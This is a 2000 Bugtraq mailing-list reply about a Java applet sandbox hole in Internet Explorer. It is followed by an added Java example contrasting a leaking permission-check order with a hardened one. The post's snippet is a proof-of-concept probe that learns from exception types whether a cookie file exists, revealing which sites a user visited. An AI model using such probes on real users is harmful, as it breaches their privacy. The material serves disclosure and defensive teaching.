[16369] in bugtraq
Re: BrownOrifice can break firewalls! NOW MSIE
daemon@ATHENA.MIT.EDU (TAKAGI, Hiromitsu)
Thu Aug 24 01:06:43 2000
Message-Id:  <20000824082415.36BC.TAKAGI@etl.go.jp>
Date:         Thu, 24 Aug 2000 09:35:51 +0900
Reply-To: "TAKAGI, Hiromitsu" <takagi@ETL.GO.JP>
From: "TAKAGI, Hiromitsu" <takagi@ETL.GO.JP>
To: BUGTRAQ@SECURITYFOCUS.COM
In-Reply-To:  <399F8F0F.ADF65EFB@oltres.com>
On Sun, 20 Aug 2000 10:55:59 +0300
Alexey Yarovinsky <ayarovin@OLTRES.COM> wrote:
> The same security hole exists in MSIE too, with one restriction: the URL can't
> start with file:. But still, an applet from an outside site can access your
> intranet servers including ftps and ALL sites you have access to. The
> demonstration of the bug is here:
> http://www.oltres.com/ms-bug/

A "file:" URL can be used to exploit. A malicious applet certainly cannot
read the content of files, but it can determine whether the specified
file exists or not.

    try {
        new WURLConnection("file:/C:/WINDOWS/Cookies/default@playboy[1].txt");
    } catch (SecurityException e) {
        System.out.println("You have visited the Playboy site.");
    } catch (java.io.FileNotFoundException e) {
        System.out.println("You may not have visited the Playboy site.");
    }
Regards,
--
Hiromitsu Takagi
Electrotechnical Laboratory
http://www.etl.go.jp/~takagi/
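
The message above describes an existence oracle: the applet learns whether a file exists from which exception it gets back. The following is an added example, not code from either poster or from any browser's JVM. It contrasts a check order that leaks existence with one that does not. The class name, the `allowed` policy and the sample paths are all constructed for illustration.

```java
import java.io.FileNotFoundException;
import java.util.Set;

public class ExistenceOracleDemo {
    // Constructed sample "filesystem": paths that exist on the simulated client.
    static final Set<String> EXISTING = Set.of("/home/user/cookies/site-a.txt");

    // Hypothetical sandbox policy: untrusted code may read nothing under /home.
    static boolean allowed(String path) {
        return !path.startsWith("/home/");
    }

    // Leaky order: existence is resolved before the permission check, so the
    // exception type tells untrusted code whether the path exists.
    static void openLeaky(String path) throws FileNotFoundException {
        if (!EXISTING.contains(path)) throw new FileNotFoundException(path);
        if (!allowed(path)) throw new SecurityException("access denied");
    }

    // Hardened order: permission is decided from the path alone, before any
    // lookup, so denied paths fail identically whether or not they exist.
    static void openHardened(String path) throws FileNotFoundException {
        if (!allowed(path)) throw new SecurityException("access denied");
        if (!EXISTING.contains(path)) throw new FileNotFoundException(path);
    }

    interface Opener { void open(String path) throws FileNotFoundException; }

    // What the untrusted caller can observe: only the class of the failure.
    static String observe(Opener o, String path) {
        try { o.open(path); return "opened"; }
        catch (SecurityException e) { return "SecurityException"; }
        catch (FileNotFoundException e) { return "FileNotFoundException"; }
    }

    public static void main(String[] args) {
        String present = "/home/user/cookies/site-a.txt";
        String absent = "/home/user/cookies/site-b.txt";
        for (String p : new String[] {present, absent}) {
            System.out.println(p);
            System.out.println("  leaky:    " + observe(ExistenceOracleDemo::openLeaky, p));
            System.out.println("  hardened: " + observe(ExistenceOracleDemo::openHardened, p));
        }
    }
}
```

With the leaky order the two paths produce different exception classes; with the hardened order both produce `SecurityException`, so the failure carries no information about the file.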